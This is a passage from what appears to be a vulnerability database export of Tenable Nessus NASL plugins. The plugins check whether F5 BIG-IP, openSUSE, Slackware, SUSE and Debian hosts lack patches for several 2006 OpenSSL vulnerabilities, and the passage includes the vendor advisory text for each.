"cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL6734.NASL", "href": "https://www.tenable.com/plugins/nessus/78213", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL6734.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78213);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_bugtraq_id(20246, 20247, 20248, 20249, 22083);\n\n script_name(english:\"F5 Networks BIG-IP : Local OpenSSL vulnerabilities (SOL6734)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a security\nadvisory.\"\n );\n # http://www.openssl.org/news/secadv/20060928.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20060928.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K6734\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL6734.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL6734\";\nvmatrix = make_array();\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\",\"9.4.0-9.4.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9.3\",\"9.4.2-9.4.8\",\"10\",\"11\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\",\"9.4.0-9.4.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"9.3\",\"9.4.2-9.4.8\",\"10\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.4.0-9.4.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9.3\",\"9.4.2-9.4.8\",\"10\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.1.2\",\"9.2.0-9.2.5\",\"9.4.0-9.4.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9.1.3\",\"9.3\",\"9.4.2-9.4.8\",\"9.6\",\"10\",\"11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0-9.4.1\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"9.4.2-9.4.8\",\"10\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:13:32", "description": "A buffer overflow condition within the SSL_get_shared_ciphers() function and a DoS condition known as 'parasitic public keys' have been fixed. The later problem allowed attackers to trick the OpenSSL engine to spend an extraordinary amount of time to process public keys. The following CAN numbers have been assigned: CVE-2006-2937, CVE-2006-2940, CVE-2006-3738 and CVE-2006-4343.", "cvss3": {"score": null, "vector": null}, "published": "2007-10-17T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : openssl (openssl-2140)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssl", "p-cpe:/a:novell:opensuse:openssl-32bit", "p-cpe:/a:novell:opensuse:openssl-devel", "p-cpe:/a:novell:opensuse:openssl-devel-32bit", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_OPENSSL-2140.NASL", "href": "https://www.tenable.com/plugins/nessus/27368", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openssl-2140.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27368);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n\n script_name(english:\"openSUSE 10 Security Update : openssl (openssl-2140)\");\n script_summary(english:\"Check for the openssl-2140 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow condition within the SSL_get_shared_ciphers()\nfunction and a DoS condition known as 'parasitic public keys' have\nbeen fixed. The later problem allowed attackers to trick the OpenSSL\nengine to spend an extraordinary amount of time to process public\nkeys. The following CAN numbers have been assigned: CVE-2006-2937,\nCVE-2006-2940, CVE-2006-3738 and CVE-2006-4343.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"openssl-0.9.8a-18.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"openssl-devel-0.9.8a-18.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.10\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:15:16", "description": "New openssl packages are available for Slackware 9.0, 9.1, 10.0, 10.1, 10.2, and -current to fix security issues.", "cvss3": {"score": null, "vector": null}, "published": "2006-09-29T00:00:00", "type": "nessus", "title": "Slackware 10.0 / 10.1 / 10.2 / 9.0 / 9.1 / current : openssl (SSA:2006-272-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:openssl", "p-cpe:/a:slackware:slackware_linux:openssl-solibs", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux:10.1", "cpe:/o:slackware:slackware_linux:10.2", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1"], "id": "SLACKWARE_SSA_2006-272-01.NASL", "href": "https://www.tenable.com/plugins/nessus/22467", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-272-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22467);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_xref(name:\"SSA\", value:\"2006-272-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 9.0 / 9.1 / current : openssl (SSA:2006-272-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New openssl packages are available for Slackware 9.0, 9.1, 10.0,\n10.1, 10.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.676946\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47ccb197\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl and / or openssl-solibs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:openssl-solibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"9.0\", pkgname:\"openssl\", pkgver:\"0.9.7l\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\nif (slackware_check(osver:\"9.0\", pkgname:\"openssl-solibs\", pkgver:\"0.9.7l\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"openssl\", pkgver:\"0.9.7l\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\nif (slackware_check(osver:\"9.1\", pkgname:\"openssl-solibs\", pkgver:\"0.9.7l\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"openssl\", pkgver:\"0.9.7l\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\nif (slackware_check(osver:\"10.0\", pkgname:\"openssl-solibs\", pkgver:\"0.9.7l\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"openssl\", pkgver:\"0.9.7l\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\nif (slackware_check(osver:\"10.1\", pkgname:\"openssl-solibs\", pkgver:\"0.9.7l\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"openssl\", pkgver:\"0.9.7l\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\nif (slackware_check(osver:\"10.2\", pkgname:\"openssl-solibs\", pkgver:\"0.9.7l\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"openssl\", pkgver:\"0.9.8d\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"openssl-solibs\", pkgver:\"0.9.8d\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:19:25", "description": "The remote host is missing the patch for the advisory SUSE-SA:2006:058 (openssl).\n\n\nSeveral security problems were found and fixed in the OpenSSL cryptographic library.\n\nCVE-2006-3738/VU#547300:\nA Google security audit found a buffer overflow condition within the SSL_get_shared_ciphers() function which has been fixed.\n\nCVE-2006-4343/VU#386964:\nThe above Google security audit also found that the OpenSSL SSLv2 client code fails to properly check for NULL which could lead to a server program using openssl to crash.\n\nCVE-2006-2937:\nFix mishandling of an error condition in parsing of certain invalid ASN1 structures, which could result in an infinite loop which consumes system memory.\n\nCVE-2006-2940:\nCertain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack to cause the remote side top spend an excessive amount of time in computation.", "cvss3": {}, "published": "2007-02-18T00:00:00", "type": "nessus", "title": "SUSE-SA:2006:058: openssl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "SUSE_SA_2006_058.NASL", "href": "https://www.tenable.com/plugins/nessus/24436", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:058\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(24436);\n script_version(\"1.10\");\n \n name[\"english\"] = \"SUSE-SA:2006:058: openssl\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2006:058 (openssl).\n\n\nSeveral security problems were found and fixed in the OpenSSL\ncryptographic library.\n\nCVE-2006-3738/VU#547300:\nA Google security audit found a buffer overflow condition within the\nSSL_get_shared_ciphers() function which has been fixed.\n\nCVE-2006-4343/VU#386964:\nThe above Google security audit also found that the OpenSSL SSLv2\nclient code fails to properly check for NULL which could lead to a\nserver program using openssl to crash.\n\nCVE-2006-2937:\nFix mishandling of an error condition in parsing of certain invalid\nASN1 structures, which could result in an infinite loop which consumes\nsystem memory.\n\nCVE-2006-2940:\nCertain types of public key can take disproportionate amounts of time\nto process. This could be used by an attacker in a denial of service\nattack to cause the remote side top spend an excessive amount of time\nin computation.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.novell.com/linux/security/advisories/2006_58_openssl.html\" );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\" );\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the openssl package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"openssl-0.9.7g-2.10\", release:\"SUSE10.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.7g-2.10\", release:\"SUSE10.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.7d-25.6\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.7d-25.6\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.7e-3.6\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.7e-3.6\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-19T13:14:50", "description": "The fix used to correct CVE-2006-2940 introduced code that could lead to the use of uninitialized memory. Such use is likely to cause the application using the openssl library to crash, and has the potential to allow an attacker to cause the execution of arbitrary code. For reference please find below the original advisory text :\n\n Multiple vulnerabilities have been discovered in the OpenSSL cryptographic software package that could allow an attacker to launch a denial of service attack by exhausting system resources or crashing processes on a victim's computer.\n\n - CVE-2006-2937 Dr S N Henson of the OpenSSL core team and Open Network Security recently developed an ASN1 test suite for NISCC (www.niscc.gov.uk). When the test suite was run against OpenSSL two denial of service vulnerabilities were discovered.\n\n During the parsing of certain invalid ASN1 structures an error condition is mishandled. This can result in an infinite loop which consumes system memory.\n\n Any code which uses OpenSSL to parse ASN1 data from untrusted sources is affected. This includes SSL servers which enable client authentication and S/MIME applications.\n\n - CVE-2006-3738 Tavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in SSL_get_shared_ciphers utility function, used by some applications such as exim and mysql. An attacker could send a list of ciphers that would overrun a buffer.\n\n - CVE-2006-4343 Tavis Ormandy and Will Drewry of the Google Security Team discovered a possible DoS in the sslv2 client code. Where a client application uses OpenSSL to make a SSLv2 connection to a malicious server that server could cause the client to crash.\n\n - CVE-2006-2940 Dr S N Henson of the OpenSSL core team and Open Network Security recently developed an ASN1 test suite for NISCC (www.niscc.gov.uk). When the test suite was run against OpenSSL a DoS was discovered.\n\n Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack.", "cvss3": {"score": null, "vector": null}, "published": "2006-10-14T00:00:00", "type": "nessus", "title": "Debian DSA-1185-2 : openssl - denial of service", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:openssl", "cpe:/o:debian:debian_linux:3.1"], "id": "DEBIAN_DSA-1185.NASL", "href": "https://www.tenable.com/plugins/nessus/22727", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1185. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22727);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_xref(name:\"DSA\", value:\"1185\");\n\n script_name(english:\"Debian DSA-1185-2 : openssl - denial of service\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The fix used to correct CVE-2006-2940 introduced code that could lead\nto the use of uninitialized memory. Such use is likely to cause the\napplication using the openssl library to crash, and has the potential\nto allow an attacker to cause the execution of arbitrary code. For\nreference please find below the original advisory text :\n\n Multiple vulnerabilities have been discovered in the OpenSSL\n cryptographic software package that could allow an attacker to\n launch a denial of service attack by exhausting system resources or\n crashing processes on a victim's computer.\n\n - CVE-2006-2937\n Dr S N Henson of the OpenSSL core team and Open\n Network Security recently developed an ASN1 test suite\n for NISCC (www.niscc.gov.uk). When the test suite was\n run against OpenSSL two denial of service\n vulnerabilities were discovered.\n\n During the parsing of certain invalid ASN1 structures an error\n condition is mishandled. This can result in an infinite loop which\n consumes system memory.\n\n Any code which uses OpenSSL to parse ASN1 data from untrusted\n sources is affected. This includes SSL servers which enable client\n authentication and S/MIME applications.\n\n - CVE-2006-3738\n Tavis Ormandy and Will Drewry of the Google Security\n Team discovered a buffer overflow in\n SSL_get_shared_ciphers utility function, used by some\n applications such as exim and mysql. An attacker could\n send a list of ciphers that would overrun a buffer.\n\n - CVE-2006-4343\n Tavis Ormandy and Will Drewry of the Google Security\n Team discovered a possible DoS in the sslv2 client\n code. Where a client application uses OpenSSL to make\n a SSLv2 connection to a malicious server that server\n could cause the client to crash.\n\n - CVE-2006-2940\n Dr S N Henson of the OpenSSL core team and Open\n Network Security recently developed an ASN1 test suite\n for NISCC (www.niscc.gov.uk). When the test suite was\n run against OpenSSL a DoS was discovered.\n\n Certain types of public key can take disproportionate amounts of\n time to process. This could be used by an attacker in a denial of\n service attack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-2937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-4343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-2940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1185\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssl package. Note that services linking against the\nopenssl shared libraries will need to be restarted. Common examples of\nsuch services include most Mail Transport Agents, SSH servers, and web\nservers.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.9.7e-3sarge4.\n\nFor the unstable and testing distributions (sid and etch,\nrespectively), these problems will be fixed in version 0.9.7k-3 of the\nopenssl097 compatibility libraries, and version 0.9.8c-3 of the\nopenssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libssl-dev\", reference:\"0.9.7e-3sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libssl0.9.7\", reference:\"0.9.7e-3sarge4\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"openssl\", reference:\"0.9.7e-3sarge4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 